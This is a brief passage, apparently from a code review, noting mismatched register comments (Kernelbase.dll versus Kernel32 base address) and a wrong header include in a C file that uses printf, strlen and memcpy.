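Kernelbase.dll address` also disagrees with the later `;Kernel32 base address` comments for the same register, and `#include <iostream>` is a C++ header in a `.c` file that does not declare `printf`, `strlen` or `memcpy` (`<stdio.h>` and `<string.h>` do).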